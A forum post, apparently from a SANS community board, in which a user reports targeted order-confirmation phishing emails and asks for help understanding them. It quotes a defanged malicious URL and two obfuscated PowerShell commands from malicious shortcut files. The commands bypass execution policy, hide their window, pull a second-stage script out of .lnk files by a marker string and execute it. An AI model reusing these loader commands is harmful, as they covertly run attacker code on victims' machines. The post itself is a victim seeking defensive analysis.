|
All, hoping this shows up as previous ended up having no msg body in the post. I have been receiving "targetted" malware emails over the last couple of months (targetted in that they have my companies address and main telephone number correctly listed in the email). Each email is an order confirmation with a hyperlink for the "order details". The link is to a zip file which each time contains a shortcut file which is a powershell cmd and a jpg file which for some reason is always marked as hidden. In the latest which I have reported a week ago but is still live has a link to : hXXps://rkbbeauty.com/.cabinet/838IZ46044-package-updated The jpg is named "image_20180905_190126_22.jpg" and the shortcut "838IZ46044-package-updated.lnk" The powershell cmd has changed from when I first reported it to: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c "&{powershell -w"in hi"d"den -c {$g=findstr /s dikona $env:userprofile\*.lnk;powershell -c $g}}" which previously was: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $no="po"wer"shel"l -win hi"dd"en -c "fi"nds"tr /s glirote3 $env:userprofile\*.lnk > $env:userprofile\Downloads\vvv"."p"s"1; & $env:userprofile\Downloads\vvv"."p"s"1"; start-process $no What I was hoping someone would be able to shed some light on is what is "dikona" or "glirote3". Thanks in advance |
W60 14 Posts |
| thread locked Quote Subscribe |
Sep 10th 2018 3 years ago |
Sign Up for Free or Log In to start participating in the conversation!
https://www.sans.edu
